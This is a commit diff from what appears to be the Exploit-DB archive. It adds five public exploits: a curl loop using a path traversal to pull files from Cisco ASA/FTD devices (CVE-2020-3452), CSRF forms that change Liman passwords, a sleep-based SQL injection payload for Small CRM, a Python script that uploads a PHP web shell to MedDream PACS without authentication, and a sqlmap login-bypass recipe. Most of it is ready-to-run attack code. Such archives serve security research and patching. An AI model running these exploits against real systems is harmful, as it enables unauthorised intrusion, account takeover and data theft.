DB: 2020-10-13
5 changes to exploits/shellcodes Small CRM 2.0 - 'email' SQL Injection MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated) Liman 0.7 - Cross-Site Request Forgery (Change Password) Online Students Management System 1.0 - 'username' SQL Injections Cisco ASA and FTD 9.6.4.42 - Path Traversal
This commit is contained in:
parent
0aa8d538e2
commit
14fcd4863f
6 changed files with 289 additions and 0 deletions
25
exploits/hardware/webapps/48871.txt
Normal file
25
exploits/hardware/webapps/48871.txt
Normal file
|
@ -0,0 +1,25 @@
|
||||||
|
# Exploit Title: Cisco ASA and FTD 9.6.4.42 - Path Traversal
|
||||||
|
# Date: 2020-10-10
|
||||||
|
# Exploit Author: 3ndG4me
|
||||||
|
# Vendor: www.cisco.com
|
||||||
|
# Product: https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html
|
||||||
|
# CVE : CVE-2020-3452
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
TARGET=$1
|
||||||
|
CISCO_KNOWN_FILES="logo.gif http_auth.html user_dialog.html localization_inc.lua portal_inc.lua include nostcaccess.html ask.html no_svc.html svc.html session.js useralert.html ping.html help app_index.html tlbr portal_forms.js logon_forms.js win.js portal.css portal.js sess_update.html blank.html noportal.html portal_ce.html portal.html home logon_custom.css portal_custom.css preview.html session_expired custom portal_elements.html commonspawn.js common.js appstart.js appstatus relaymonjar.html relaymonocx.html relayjar.html relayocx.html portal_img color_picker.js color_picker.html cedhelp.html cedmain.html cedlogon.html cedportal.html cedsave.html cedf.html ced.html lced.html files 041235123432C2 041235123432U2 pluginlib.js shshim do_url clear_cache connection_failed_form apcf ucte_forbidden_data ucte_forbidden_url cookie session_password.html tunnel_linux.jnlp tunnel_mac.jnlp sdesktop gp-gip.html auth.html wrong_url.html logon_redirect.html logout.html logon.html test_chargen"
|
||||||
|
mkdir cisco_asa_files
|
||||||
|
|
||||||
|
if [ -z "$1" ];
|
||||||
|
then
|
||||||
|
echo "Usage: cve-2020-3452.sh <target ip/hostname>"
|
||||||
|
echo "Example: cve-2020-3452.sh mytarget.com"
|
||||||
|
echo "Files that are downloaded will be in the newly created 'cisco_asa_files' directory"
|
||||||
|
echo "Target not specificed...exiting..."
|
||||||
|
else
|
||||||
|
for FILE in $CISCO_KNOWN_FILES;
|
||||||
|
do
|
||||||
|
curl "https://$TARGET/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/${FILE}&default-language&lang=../" | tee cisco_asa_files/$FILE;
|
||||||
|
done
|
||||||
|
fi
|
64
exploits/multiple/webapps/48869.txt
Normal file
64
exploits/multiple/webapps/48869.txt
Normal file
|
@ -0,0 +1,64 @@
|
||||||
|
# Exploit Title: Liman 0.7 - Cross-Site Request Forgery (Change Password)
|
||||||
|
# Date: 2020-10-07
|
||||||
|
# Exploit Author: George Tsimpidas
|
||||||
|
# Software Link : https://github.com/salihciftci/liman/releases/tag/v0.7
|
||||||
|
# Version: 0.7
|
||||||
|
# Tested on: Ubuntu 18.04.5 LTS (Bionic Beaver)
|
||||||
|
# Category: Webapp
|
||||||
|
|
||||||
|
Description:
|
||||||
|
|
||||||
|
There is no CSRF protection in Liman application, with a little help
|
||||||
|
of social engineering (like sending a link via email/chat) an attacker may
|
||||||
|
force the victim to click on a malicious link, with the purpose of
|
||||||
|
manipulating his current account information, or changing entirely his
|
||||||
|
password.
|
||||||
|
|
||||||
|
Vulnerable Endpoints :
|
||||||
|
|
||||||
|
http://127.0.0.1:5000/settings/profile
|
||||||
|
http://127.0.0.1:5000/settings/password
|
||||||
|
|
||||||
|
Proof of Concept
|
||||||
|
|
||||||
|
|
||||||
|
Download the application, make an account and login inside the
|
||||||
|
panel under : http://127.0.0.1:5000 expose the docker port on 5000.
|
||||||
|
|
||||||
|
|
||||||
|
Save this .html files and send it to victim (Victim should be
|
||||||
|
logged in in the browser)
|
||||||
|
|
||||||
|
Crafted value will be added.
|
||||||
|
|
||||||
|
Account Information CSRF :
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
|
||||||
|
<script>history.pushState('', '', '/')</script>
|
||||||
|
<form action="http://127.0.0.1:5000/settings/profile" method="POST">
|
||||||
|
<input type="hidden" name="username" value="betatest" />
|
||||||
|
<input type="hidden" name="email" value="test@gmail.com" />
|
||||||
|
<input type="submit" value="TakeOver Account Settings" />
|
||||||
|
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
|
||||||
|
Password Change CSRF :
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
|
||||||
|
<script>history.pushState('', '', '/')</script>
|
||||||
|
<form action="http://127.0.0.1:5000/settings/password" method="POST">
|
||||||
|
<input type="hidden" name="password" value="takeover" />
|
||||||
|
<input type="hidden" name="newPassword" value="takeover" />
|
||||||
|
<input type="hidden" name="confirmPassword" value="takeover" />
|
||||||
|
<input type="submit" value="Password TakeOver" />
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
</body>
|
||||||
|
</html>
|
41
exploits/php/webapps/48867.txt
Normal file
41
exploits/php/webapps/48867.txt
Normal file
|
@ -0,0 +1,41 @@
|
||||||
|
# Exploit Title: Small CRM 2.0 - 'email' SQL Injection
|
||||||
|
# Google Dork: N/A
|
||||||
|
# Date: 2020-10-10
|
||||||
|
# Exploit Author: Ahmet Ümit BAYRAM
|
||||||
|
# Vendor Homepage: https://phpgurukul.com/
|
||||||
|
# Software Link: https://phpgurukul.com/small-crm-php/
|
||||||
|
# Version: V2.0
|
||||||
|
# Tested on: Kali Linux
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
========== Vulnerable Code ==========
|
||||||
|
|
||||||
|
mysqli_query $row1 = mysqli_query($con, "select email,password from user
|
||||||
|
where email='" . $_POST['email'] . "'"); // dbconnection.php
|
||||||
|
|
||||||
|
========== Post Request ====================
|
||||||
|
|
||||||
|
POST /crm/forgot-password.php HTTP/1.1
|
||||||
|
Host: localhost
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
|
||||||
|
Firefox/68.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Referer: localhost/crm/forgot-password.php
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 20
|
||||||
|
Connection: close
|
||||||
|
Cookie: __test=ec283e73906679549573af64209a5d5b;
|
||||||
|
PHPSESSID=4d272f5938b3ec9c60bb45c4d7b44497
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
email=test@test.com&submit=
|
||||||
|
|
||||||
|
============= Vulnerable Parameter ===============
|
||||||
|
|
||||||
|
email (POST)
|
||||||
|
|
||||||
|
============= Payload =========================
|
||||||
|
|
||||||
|
' AND (SELECT 1543 FROM (SELECT(SLEEP(5)))gSRd) AND 'PCOX'='PCOX
|
103
exploits/php/webapps/48868.py
Executable file
103
exploits/php/webapps/48868.py
Executable file
|
@ -0,0 +1,103 @@
|
||||||
|
#!/usr/bin/python
|
||||||
|
#
|
||||||
|
# Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated)
|
||||||
|
# Exploit Author: bzyo
|
||||||
|
# Twitter: @bzyo_
|
||||||
|
# Date: 10-10-2020
|
||||||
|
# Vulnerable Software: https://www.softneta.com/products/meddream-pacs-server/
|
||||||
|
# Vendor Homepage: https://www.softneta.com
|
||||||
|
# Version: 6.8.3.751
|
||||||
|
# Tested On: Windows 2016
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Update to EB 48853 < AUTHENTICATION WAS NOT NEEDED LOLZ
|
||||||
|
#
|
||||||
|
##PoC##
|
||||||
|
#
|
||||||
|
# 1. create one line php shell to call commands
|
||||||
|
# 2. run script on attacking machine
|
||||||
|
# 3. enter parameters; IP, filename, command
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# root@kali:~# python meddream.py
|
||||||
|
# Enter IP Address: 192.168.0.223
|
||||||
|
# Enter payload filename + .php: cmd.php
|
||||||
|
# Enter command: whoami
|
||||||
|
# 170759
|
||||||
|
# <pre>nt authority\system
|
||||||
|
# </pre>
|
||||||
|
# http://192.168.0.223/Pacs/upload/20201010-170759--cmd.php?cmd=whoami
|
||||||
|
# 404
|
||||||
|
# 404
|
||||||
|
# 404
|
||||||
|
# 404
|
||||||
|
# 404
|
||||||
|
# 404
|
||||||
|
# 404
|
||||||
|
# 404
|
||||||
|
# 404
|
||||||
|
#
|
||||||
|
#
|
||||||
|
|
||||||
|
from urllib2 import urlopen
|
||||||
|
import requests
|
||||||
|
import sys
|
||||||
|
import time
|
||||||
|
from datetime import datetime, timedelta
|
||||||
|
|
||||||
|
ip_addr = raw_input("Enter IP Address: ")
|
||||||
|
user_file = raw_input("Enter payload filename + .php: ")
|
||||||
|
cmd = raw_input("Enter command: ")
|
||||||
|
|
||||||
|
URL= 'http://' + ip_addr + '/Pacs/uploadImage.php'
|
||||||
|
|
||||||
|
def main():
|
||||||
|
session = requests.Session()
|
||||||
|
|
||||||
|
files = [
|
||||||
|
('actionvalue', (None, 'Attach', None)),
|
||||||
|
('uploadfile', (user_file, open(user_file, 'rb'), 'application/x-php')),
|
||||||
|
('action', (None, 'Attach', None)),
|
||||||
|
]
|
||||||
|
|
||||||
|
site = session.post(URL, files=files)
|
||||||
|
|
||||||
|
today = datetime.today()
|
||||||
|
upload_date = today.strftime("%Y%m%d")
|
||||||
|
|
||||||
|
less = 1
|
||||||
|
now1 = datetime.now()
|
||||||
|
up_time1 = now1.strftime("%H%M%S")
|
||||||
|
print(up_time1)
|
||||||
|
#varying time checks +/-
|
||||||
|
now2 = now1 - timedelta(seconds=less)
|
||||||
|
up_time2 = now2.strftime("%H%M%S")
|
||||||
|
now3 = now2 - timedelta(seconds=less)
|
||||||
|
up_time3 = now3.strftime("%H%M%S")
|
||||||
|
now4 = now3 - timedelta(seconds=less)
|
||||||
|
up_time4 = now4.strftime("%H%M%S")
|
||||||
|
now5 = now4 - timedelta(seconds=less)
|
||||||
|
up_time5 = now5.strftime("%H%M%S")
|
||||||
|
now6 = now5 - timedelta(seconds=less)
|
||||||
|
up_time6 = now6.strftime("%H%M%S")
|
||||||
|
now7 = now6 - timedelta(seconds=less)
|
||||||
|
up_time7 = now7.strftime("%H%M%S")
|
||||||
|
now8 = now1 + timedelta(seconds=less)
|
||||||
|
up_time8 = now8.strftime("%H%M%S")
|
||||||
|
now9 = now8 + timedelta(seconds=less)
|
||||||
|
up_time9 = now8.strftime("%H%M%S")
|
||||||
|
now10 = now1 + timedelta(seconds=less)
|
||||||
|
up_time10 = now9.strftime("%H%M%S")
|
||||||
|
|
||||||
|
|
||||||
|
up_time_array = [up_time1, up_time2, up_time3, up_time4, up_time5, up_time6, up_time7, up_time8, up_time9, up_time10]
|
||||||
|
for i in up_time_array:
|
||||||
|
r = session.get('http://' + ip_addr + '/Pacs/upload/'+ upload_date + "-" + i + "--" + user_file + "?cmd=" + cmd)
|
||||||
|
if r.status_code == 200:
|
||||||
|
print r.content
|
||||||
|
print r.url
|
||||||
|
else:
|
||||||
|
print ("404")
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
main()
|
51
exploits/php/webapps/48870.txt
Normal file
51
exploits/php/webapps/48870.txt
Normal file
|
@ -0,0 +1,51 @@
|
||||||
|
# Title: Online Students Management System 1.0 - 'username' SQL Injections
|
||||||
|
# Exploit Author: George Tsimpidas
|
||||||
|
# Date: 2020-10-09
|
||||||
|
# Vendor Homepage: www.sourcecodester.com
|
||||||
|
# Software Link:
|
||||||
|
https://www.sourcecodester.com/sites/default/files/download/janobe/studentrecord_0.zip
|
||||||
|
# Version : 1.0
|
||||||
|
# Tested on: Ubuntu 18.04.5 LTS (Bionic Beaver)
|
||||||
|
# Category: Webapp
|
||||||
|
|
||||||
|
# Description
|
||||||
|
|
||||||
|
The files index.php on the main login page, and the index.php on the
|
||||||
|
/admin/ login page does not perform input validation on the regno
|
||||||
|
and username parameters. An attacker can send malicious input in the post
|
||||||
|
request to http://localhost/index.php or either
|
||||||
|
http://localhost/admin/index.php and bypass authentication, extract
|
||||||
|
sensitive information etc.
|
||||||
|
|
||||||
|
#POC
|
||||||
|
|
||||||
|
1) Navigate to the admin login page
|
||||||
|
|
||||||
|
Example:
|
||||||
|
|
||||||
|
http://localhost/admin/index.php
|
||||||
|
|
||||||
|
2) Fill in dummy values for 'username' and 'password' fields and send the
|
||||||
|
request via an HTTP intercept tool
|
||||||
|
|
||||||
|
3) Save the request to file. Example, student_record_sqli.req
|
||||||
|
|
||||||
|
POST /admin/index.php HTTP/1.1
|
||||||
|
Host: localhost
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101
|
||||||
|
Firefox/78.0
|
||||||
|
Accept: */*
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
Content-Length: 32
|
||||||
|
Origin: http://localhost
|
||||||
|
DNT: 1
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
username=admin&password=dummy
|
||||||
|
|
||||||
|
4) Run SQLmap on the file,
|
||||||
|
|
||||||
|
sqlmap -r student_record_sqli.req --dbms=mysql --threads=10 -p username
|
|
@ -40685,6 +40685,11 @@ id,file,description,date,author,type,platform,port
|
||||||
48864,exploits/php/webapps/48864.txt,"Kentico CMS 9.0-12.0.49 - Persistent Cross Site Scripting",2020-10-09,"Ataberk YAVUZER",webapps,php,
|
48864,exploits/php/webapps/48864.txt,"Kentico CMS 9.0-12.0.49 - Persistent Cross Site Scripting",2020-10-09,"Ataberk YAVUZER",webapps,php,
|
||||||
48865,exploits/php/webapps/48865.txt,"DynPG 4.9.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-09,"Enes Özeser",webapps,php,
|
48865,exploits/php/webapps/48865.txt,"DynPG 4.9.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-09,"Enes Özeser",webapps,php,
|
||||||
48866,exploits/json/webapps/48866.txt,"openMAINT 1.1-2.4.2 - Arbitrary File Upload",2020-10-09,mrb3n,webapps,json,
|
48866,exploits/json/webapps/48866.txt,"openMAINT 1.1-2.4.2 - Arbitrary File Upload",2020-10-09,mrb3n,webapps,json,
|
||||||
|
48867,exploits/php/webapps/48867.txt,"Small CRM 2.0 - 'email' SQL Injection",2020-10-12,"Ahmet Ümit BAYRAM",webapps,php,
|
||||||
|
48868,exploits/php/webapps/48868.py,"MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated)",2020-10-12,bzyo,webapps,php,
|
||||||
|
48869,exploits/multiple/webapps/48869.txt,"Liman 0.7 - Cross-Site Request Forgery (Change Password)",2020-10-12,"George Tsimpidas",webapps,multiple,
|
||||||
|
48870,exploits/php/webapps/48870.txt,"Online Students Management System 1.0 - 'username' SQL Injections",2020-10-12,"George Tsimpidas",webapps,php,
|
||||||
|
48871,exploits/hardware/webapps/48871.txt,"Cisco ASA and FTD 9.6.4.42 - Path Traversal",2020-10-12,3ndG4me,webapps,hardware,
|
||||||
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
|
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
|
||||||
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
|
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
|
||||||
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
|
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue